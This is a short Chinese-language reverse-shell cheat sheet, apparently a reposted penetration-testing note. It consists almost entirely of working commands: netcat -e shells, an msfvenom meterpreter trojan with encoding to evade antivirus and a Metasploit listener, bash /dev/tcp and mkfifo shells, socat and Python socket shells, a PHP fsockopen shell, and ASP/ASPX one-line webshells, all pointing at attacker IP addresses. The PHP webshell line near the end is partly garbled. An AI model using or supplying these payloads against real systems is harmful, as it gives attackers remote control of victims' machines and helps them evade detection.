反dshell
nc -e cmd.exe 攻击机ip 4444(反dwindows shell) nc -e /bin/bash 攻击机ip 4444(反dlinux shell)方法二
将shell映射到自己本地的端口上,然后等待他人连接
nc -lvp 4444 -e cmd.exe (反dwindows shell) nc -lvp 4444 -e /bin/bash (反dlinux shell)
连接端口
nc -vv 获取shell的ip 4444使用msf
msfvenom制作反d木马,自行选择合适的payload和文件类型,以及修改自己的host'
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=4444 -f exe -o 123.exe
msfencode来进行编码免杀,
然后msfconsole来进行监听反d的窗口
msfdb run use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 10.10.16.7 run使用bash
bash -i >& /dev/tcp/10.10.14.2/8081 0>&1 bash -c 'bash -i >& /dev/tcp/10.10.16.7/4444 0>&1' 0<&31-;exec 31<>/dev/tcp/10.10.16.7/4444;sh <&31 >&31 2>&31 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 1234 >/tmp/f使用socat
这个是从一个老哥那里看来的没有自己使用过,暂作记录内网渗透之——内网转发
socat反dtcp接收端(攻击机): ./socat TCP-LISTEN:4444 发送端(靶机): ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.16.7:4444socat反d(udp)
接收端:
nc -lvnp 4444
发送端:
socat udp-connect:10.10.16.7:4444 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &使用python
同样需要nc监听本地端口
nc -lvnp 4444
然后想办法在靶机中执行语句
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket. SOCK_STREAM);s.settimeout(10);s.connect(("10.10.14.8",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
用来转发linux的shell
用python发出一个完整的shell
python3 -c 'import pty;pty.spawn("/bin/bash")'使用php
需要nc监听本地端口
nc -lvnp 4444
然后再php中文件中注入
php -r '$sock=fsockopen("10.10.16.7",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
或者在文件中直接注入系统语句,并留下变量
再或者利用文件上传,用一句话木马,然后用冰蝎剑蚁菜刀一类的东西来连接
php一句话木马: asp一句话木马: <%eval request ("value")%> 或 <% execute(request("value")) %> aspx一句话木马: <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %> ' ) ; ?> 将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)